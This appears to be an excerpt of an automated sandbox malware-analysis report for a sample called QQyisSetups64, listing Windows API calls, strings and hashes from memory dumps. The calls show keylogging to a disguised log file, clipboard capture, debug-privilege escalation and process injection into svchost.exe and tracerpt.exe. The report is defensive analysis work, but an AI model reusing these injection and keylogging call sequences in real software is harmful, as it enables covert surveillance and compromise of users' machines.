                                                                                                                                                                                                                      • Instruction ID: 6b55702c6d9d5dbb1946f79e326efbaf59539ae41fbdd7843f6ef2bee382d1c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEC08C70C4CB9CE18C2069131D0D27CB2E44B44A59F2094EFE84BB6CC0A1A526D0C6EE
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02CA0693
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                      • Opcode ID: bb3e69414ba11e6911276100639b5ce6f1d27cad50d50593baf7689d0f110ccd
                                                                                                                                                                                                                      • Instruction ID: 0f2cece0115dd170b91a16a9f72bee97c5acd121337a2bba9b04c4658f99f4f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb3e69414ba11e6911276100639b5ce6f1d27cad50d50593baf7689d0f110ccd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6C04828B8C226E9F86422862C2FB3419043B47FADF709727F223AD8C358900480C6A7
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C9FAB1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                      • Opcode ID: ba86a7c5707d582c86a3a5819ac6beca6f2a4553fb53bd5026179ff24a9dc747
                                                                                                                                                                                                                      • Instruction ID: 6c7c37dad574cf943c6472323c73d0b820be1e4e1bd04566ae0e43526dea4fb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba86a7c5707d582c86a3a5819ac6beca6f2a4553fb53bd5026179ff24a9dc747
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBD012B4104900D7D700AB51C48C71AB2E6BF44300F20C919C45ED2E10C63CE841CA91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                                                                      • Opcode ID: 736ede7d76a5cc52b0552456f0c32e8c5e696298af75a6c6a4be6e1ab7a05efa
                                                                                                                                                                                                                      • Instruction ID: bbba33c90a97f9003943eecad8a99afa4755c01afb6b57d81630c7986d0b0253
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 736ede7d76a5cc52b0552456f0c32e8c5e696298af75a6c6a4be6e1ab7a05efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 239002387C4501AA56010922788C7552754560468134419199403C0400D61083549954
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 02C85EB2
                                                                                                                                                                                                                        • Part of subcall function 02C86F17: _malloc.LIBCMT ref: 02C86F31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 617756273-0
                                                                                                                                                                                                                      • Opcode ID: 2a76ea4aae0fbe997f371a7061f41686705ad99607b3b71d3f1d4627375894b4
                                                                                                                                                                                                                      • Instruction ID: b352fbfa3509c93807e2320f5fe119ed952e25cc078ad3b327ad8af56ae5872d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a76ea4aae0fbe997f371a7061f41686705ad99607b3b71d3f1d4627375894b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FD0A9B2D042028BABA02DA104DC22E60622780288FA48139C20AC2800D6624A54C7D2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378E8A9
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,?,0378604D), ref: 0378E8B3
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0378E8BF
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0378E8D2
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(037B1F08,00000000), ref: 0378E8DA
                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0378E8E2
                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0378E8EA
                                                                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0378E8FB
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0378E90C
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378E985
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378E9A3
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0378E9AC
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0378E9B2
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0378E9CA
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0378E9E4
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378EA02
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037A5B48,?,00000000), ref: 0378EA16
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,037A5B48,00000000), ref: 0378EA25
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378EA2C
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0378EA38
                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0378EABC
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037AB4A8), ref: 0378EB0B
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378EB1D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037AB4D0), ref: 0378EB3E
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037AB4D0), ref: 0378EB61
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378EB7F
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378EB95
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378EBBF
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0378EC0B
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0378EC21
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0378EC3B
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378EC59
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0378EC69
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0378EC74
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378EC7B
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0378EC88
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                                                                                                                      • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                                                                                                                      • API String ID: 1637302245-2373594894
                                                                                                                                                                                                                      • Opcode ID: dad7224858f5df0912f0ff751203eb9f693cb05cfda88280263a43cf3d0c096a
                                                                                                                                                                                                                      • Instruction ID: 120bc9caad228c4f13a3389448eec3eb5bfbc11b2b094cb4ad511753848bee4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dad7224858f5df0912f0ff751203eb9f693cb05cfda88280263a43cf3d0c096a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC1F670640700AFD720FF64DC88FAA7BF4FB88710F448A59E69AD6285E7789580CF61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787804
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787850
                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03787864
                                                                                                                                                                                                                        • Part of subcall function 03788720: _vswprintf_s.LIBCMT ref: 03788731
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787893
                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037878DA
                                                                                                                                                                                                                        • Part of subcall function 03787740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037878FC), ref: 03787756
                                                                                                                                                                                                                        • Part of subcall function 03787740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037878FC,?,?,?,?,?,?,771B0630), ref: 0378775D
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378790A
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787923
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378793B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03787944
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787956
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03787959
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378796B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0378796E
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787980
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03787983
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 0378798B
                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,771B0630,?,771B0F00), ref: 03787992
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 037879B4
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 037879CA
                                                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037879FF
                                                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03787A1B
                                                                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03787A43
                                                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03787A58
                                                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,037876F0,00001000,00000000), ref: 03787A72
                                                                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03787A90
                                                                                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03787AA1
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 03787ABA
                                                                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03787AD6
                                                                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03787AE8
                                                                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,771B0630), ref: 03787AF1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                                      • API String ID: 4176418925-3213446972
                                                                                                                                                                                                                      • Opcode ID: 309523c0e0fbe1f8327e5236e7ebc3e7c66e87fb68149e9b7b1b37100180ec32
                                                                                                                                                                                                                      • Instruction ID: 513c792430fc4d8dae3dfe975b5c4a42e0741de747b975da0a26063b977fd3bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 309523c0e0fbe1f8327e5236e7ebc3e7c66e87fb68149e9b7b1b37100180ec32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2581E2B1A807187BEB24EB65DC49FDF777CAFC5B00F104598F209A6181DAB49A80CA64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C85849
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C85868
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C8589D
                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C858B1
                                                                                                                                                                                                                        • Part of subcall function 02C859E0: _vswprintf_s.LIBCMT ref: 02C859F1
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 02C858E0
                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C85928
                                                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C8594E
                                                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C85968
                                                                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C85987
                                                                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C859A2
                                                                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,771B0630), ref: 02C859C1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                                                                                                                      • API String ID: 2170139861-1986163084
                                                                                                                                                                                                                      • Opcode ID: 2428ec778ef749dc6d3b246522c510d44890db6c99238e892586f3f8710a2f48
                                                                                                                                                                                                                      • Instruction ID: 41d8d4d88d5f3fe8eb206c420c51a55a6acd3c993d8556b948871893c0160d6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2428ec778ef749dc6d3b246522c510d44890db6c99238e892586f3f8710a2f48
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D74175B0A40308AFEB25DF60DC45FAA77B8AF44744F50859DB64DA7180DBB09A84CFA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787E73
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787E9F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03787ED4
                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03787EE8
                                                                                                                                                                                                                        • Part of subcall function 03788720: _vswprintf_s.LIBCMT ref: 03788731
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 03787F15
                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03787F65
                                                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03787F92
                                                                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03787FAA
                                                                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03787FCC
                                                                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03787FEA
                                                                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03787FFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                                      • API String ID: 2170139861-2473635271
                                                                                                                                                                                                                      • Opcode ID: dc2b3c0aa7b3ead911939c6cbd15d8bd285b157addaf8bfd3a82b14337f84876
                                                                                                                                                                                                                      • Instruction ID: f69802d0518d7cecf4de3c2d43abfd64697f0ceb166fbe7c448441e168f36781
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc2b3c0aa7b3ead911939c6cbd15d8bd285b157addaf8bfd3a82b14337f84876
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F41C5B1A40358AFDB24EB61DC85FDE77BCAB84B00F1082D9F60DA6181DAB45B81CF54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,037B0D80,771AE010,771B2FA0,771B0F00,?,03786028,?,?), ref: 0378E519
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B0D80,\DisplaySessionContainers.log,?,03786028,?,?), ref: 0378E529
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,037B0D80,?,03786028,?,?), ref: 0378E538
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03786028,?,?), ref: 0378E546
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03786028,?,?), ref: 0378E563
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,03786028,?,?), ref: 0378E56E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,03786028,?,?), ref: 0378E577
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(037B0D80,?,03786028,?,?), ref: 0378E58A
                                                                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,03786028,?,?), ref: 0378E597
                                                                                                                                                                                                                      • DirectInput8Create.DINPUT8(?,00000800,037A4934,037B1220,00000000,?,03786028,?,?), ref: 0378E5B2
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0378E665
                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0378E672
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                                                                                                                      • String ID: <$\DisplaySessionContainers.log
                                                                                                                                                                                                                      • API String ID: 1095970075-1170057892
                                                                                                                                                                                                                      • Opcode ID: 6f1def674d5be25debea33c86dd02d32c43fe5c1a38183dcfcc851a51f205786
                                                                                                                                                                                                                      • Instruction ID: 51e0ab9e4d922ee83b8ad830c2447ed46b4a02d1fdb08651645babfea9f63286
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f1def674d5be25debea33c86dd02d32c43fe5c1a38183dcfcc851a51f205786
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418D71780705AFD700EFA8EC59F9E7BB4AB88704F508948F615DB285D779E401CB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0378DFA4), ref: 03787637
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0378DFA4), ref: 0378763E
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0378765A
                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03787677
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03787681
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0378DFA4), ref: 03787691
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03787698
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 037876BA
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 037876C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                                                                                                                      • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                                                                                                                      • API String ID: 1802016953-1577477132
                                                                                                                                                                                                                      • Opcode ID: 55b25b724b6eacab5b0e250278fb66ed406bc927a1d4261f9142f53e5412aaf0
